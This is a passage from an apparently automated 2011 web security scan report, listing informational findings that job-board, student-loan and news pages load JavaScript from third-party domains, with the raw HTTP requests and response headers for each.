<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.348. http://www.giscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.giscrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.349. http://www.governmentcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.governmentcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117229

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.350. http://www.graduateschoolloans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.graduateschoolloans.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://128.121.234.97/livechat/livehelp_js.php?department=2&pingtimes=15
http://www.google-analytics.com/urchin.js
http://www.studentloanfoundation.org/tmviewbanner.php?lpgid=114&wsid=185&cid=4203&bid=350&compid=43&style=js&lpgprty=B&tp=B

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:56 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92867

<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws_scroll.j
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

           <script type="text/javascript" src="http://128.121.234.97/livechat/livehelp_js.php?department=2&pingtimes=15"></script>
...[SNIP]...
</noscript><script language='JavaScript' type='text/javascript' src='http://www.studentloanfoundation.org//tmviewbanner.php?lpgid=114&wsid=185&cid=4203&bid=350&compid=43&style=js&lpgprty=B&tp=B'></script>
...[SNIP]...

15.351. http://www.healthcarecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthcarecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140242

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.352. http://www.helpdeskcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helpdeskcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.353. http://www.hospitalitycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hospitalitycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129154

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.354. http://www.hototc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hototc.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.hototc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:30:08 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "45f8-4cca7a20-0"
Last-Modified: Fri, 29 Oct 2010 07:39:12 GMT
Content-Type: text/html
Content-Length: 17912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

15.355. http://www.hound.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hound.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/f1.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.google-analytics.com/ga.js

Request

Response

15.356. http://www.hrcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hrcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.357. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/01/05/david-koch-tea-party-republicans_n_804997.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter.js&1295646638
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1295646638&extra3
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295646638&extra6

Request

GET /2011/01/05/david-koch-tea-party-republicans_n_804997.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 291249
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295646638&extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1295646638&extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter.js&1295646638"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

15.358. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1295646638&extra3
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295646638&extra6

Request

GET /2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 294578
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:27 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
